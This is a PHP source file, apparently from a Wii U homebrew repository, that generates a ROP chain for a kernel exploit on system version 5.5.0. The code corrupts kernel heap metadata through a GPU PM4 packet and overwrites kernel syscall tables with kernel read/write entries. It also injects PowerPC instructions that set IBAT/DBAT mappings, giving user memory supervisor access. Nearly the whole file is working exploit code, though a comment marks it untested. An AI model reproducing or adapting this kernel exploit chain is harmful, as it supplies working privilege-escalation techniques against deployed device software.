ROBChain/kexploit/generatepayload.php

174 lines
6.9 KiB
PHP
Raw Normal View History

<?php
function hexentities($str) {
$return = '';
for($i = 0; $i < strlen($str); $i += 4) {
$return .= 'pushInt. 0x'.bin2hex(substr($str, $i, 4)). "\n";
}
return $return;
}
// Settings
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.
// Type 4 params
$payload_tmp_address = 0x10C51000;
$ROPHEAP = $payload_tmp_address - 0x1000; //+ is a BAD idea as is may override our payload
$ropchainselect = 99; // Own ROPChain.
require_once("../wiiuhaxx_common/wiiu_browserhax_common.php");
echo file_get_contents('rop_setup.s');
//Untested
function generateROPChain(){
$drvhax_addr = 0x105F31A4; // Some free space in memmory size: 0x4C
$KERN_SYSCALL_TBL_1 = 0xFFE84C70;
$KERN_SYSCALL_TBL_2 = 0xFFE85070;
$KERN_SYSCALL_TBL_3 = 0xFFE85470;
$KERN_SYSCALL_TBL_4 = 0xFFEAAA60;
$KERN_SYSCALL_TBL_5 = 0xFFEAAE60;
$metadata_addr = 0x1F200014; // Create kernel heap block. We manipulate the kernel heap to use THIS
// Set the kernel heap metadata entry
ropgen_writeword_tomem($drvhax_addr, $metadata_addr);
ropgen_writeword_tomem(0xFFFFFFB4, $metadata_addr +4);
ropgen_writeword_tomem(0xFFFFFFFF, $metadata_addr +8);
ropgen_writeword_tomem(0xFFFFFFFF, $metadata_addr +12);
//Build PM4 packet.
$pm4_addr = 0x10C51000;
ropgen_writeword_tomem(0xC0013900, $pm4_addr); $pm4_addr += 4; //PACKET3_MEM_SEMAPHORE
ropgen_writeword_tomem(0x1B800008, $pm4_addr); $pm4_addr += 4; //ADDR_LO = target
ropgen_writeword_tomem(0xC0000000, $pm4_addr); $pm4_addr += 4; //SEL semaphore signal
ropgen_writeword_tomem(0x80000000, $pm4_addr); $pm4_addr += 4; //nop
ropgen_writeword_tomem(0x80000000, $pm4_addr); $pm4_addr += 4; //nop
ropgen_writeword_tomem(0x80000000, $pm4_addr); $pm4_addr += 4; //nop
ropgen_writeword_tomem(0x80000000, $pm4_addr); $pm4_addr += 4; //nop
ropgen_writeword_tomem(0x80000000, $pm4_addr); $pm4_addr += 4; //nop
ropgen_DCFlushRange($pm4_addr, 0x20);
// Need to be called from the right core (we gx2 init was called, core1?)
ropgen_GX2DirectCallDisplayList($pm4_addr, 8 * 0x04); // increment value of kpaddr by 0x01000000
ropgen_GX2DirectCallDisplayList($pm4_addr, 8 * 0x04); // increment value of kpaddr by 0x01000000
ropgen_GX2Flush();
ropgen_display_u32(0);
$drvname_addr = 0x105DC1D8;
// create a string "drvhax" in memoyr
ropgen_writeword_tomem(0x44525648 , $drvname_addr);
ropgen_writeword_tomem(0x41580000, $drvname_addr +4);
//register it
ropgen_Register($drvname_addr, 6, 0, 0);
// create src buffer
$syscalls_addr = 0x105DC1E0;
ropgen_writeword_tomem(0xFFF023D4 , $syscalls_addr); // KERN_CODE_READ
ropgen_writeword_tomem(0xFFF023F4 , $syscalls_addr + 0x4); // KERN_CODE_WRITE
// Copy content of syscalls_addr to syscall tables
ropgen_writeword_tomem($KERN_SYSCALL_TBL_1 + (0x34 * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 8);
ropgen_writeword_tomem($KERN_SYSCALL_TBL_2 + (0x34 * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 8);
ropgen_writeword_tomem($KERN_SYSCALL_TBL_3 + (0x34 * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 8);
ropgen_writeword_tomem($KERN_SYSCALL_TBL_4 + (0x34 * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 8);
ropgen_writeword_tomem($KERN_SYSCALL_TBL_5 + (0x34 * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 8);
// Place a function to set the IBAT0 inside free kernel space.
$setIBAT0Addr = 0xFFF02344;
$curAddr = $setIBAT0Addr;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C0006AC,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x4C00012C,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C7083A6,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C9183A6,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C0006AC,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x4C00012C,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x4E800020,$syscalls_addr);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
//Save address in src buffer
ropgen_writeword_tomem($setIBAT0Addr,$syscalls_addr);
// setup syscall table, register it as syscall 0x7A. needs to be restored later
ropgen_writeword_tomem($KERN_SYSCALL_TBL_2 + (0x7A * 4),$drvhax_addr + 0x44);
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr, 4);
$ROP_callSC0x7A = 0x01022388; // Set exception callback. Calls syscall 0x7A
// Rop for calling syscall, set IBAT0
// We need to give the access to our memory.
// VA: 01000000..01800000 PA: 32000000..32800000 with r/w for user and supervisor
ropgen_callfunc($ROP_callSC0x7A, 0x010000FF, 0x32000012, 0x0, 0x0, 0x0);
// Setup DBAT
//reuse ibat code, but exchange the ibat to dbat commands
$curAddr = $setIBAT0Addr + 8;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C7983A6,$syscalls_addr); //mtdbatl,3,5
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
$curAddr +=4;
ropgen_writeword_tomem($curAddr,$drvhax_addr + 0x44);
ropgen_writeword_tomem(0x7C7883A6,$syscalls_addr); //mtdbath,3,5
ropgen_CopyToSaveArea($drvname_addr, 6, $syscalls_addr,4);
// set dbat
ropgen_callfunc($ROP_callSC0x7A, 0x010000FF, 0x32000012, 0x0, 0x0, 0x0);
// print value to see if everything worked so far.
ropgen_display_u32(0);
// Copy a payload to 0x011DD000, call it!
// Tasks in payload:
// - install kernel copy data
// - restore syscall 0x7A
// - restore kernel heap when we have proper code execution.
// - (install main hook and switch to miimaker)
}
generateROPChain();
echo hexentities($ROPCHAIN);
?>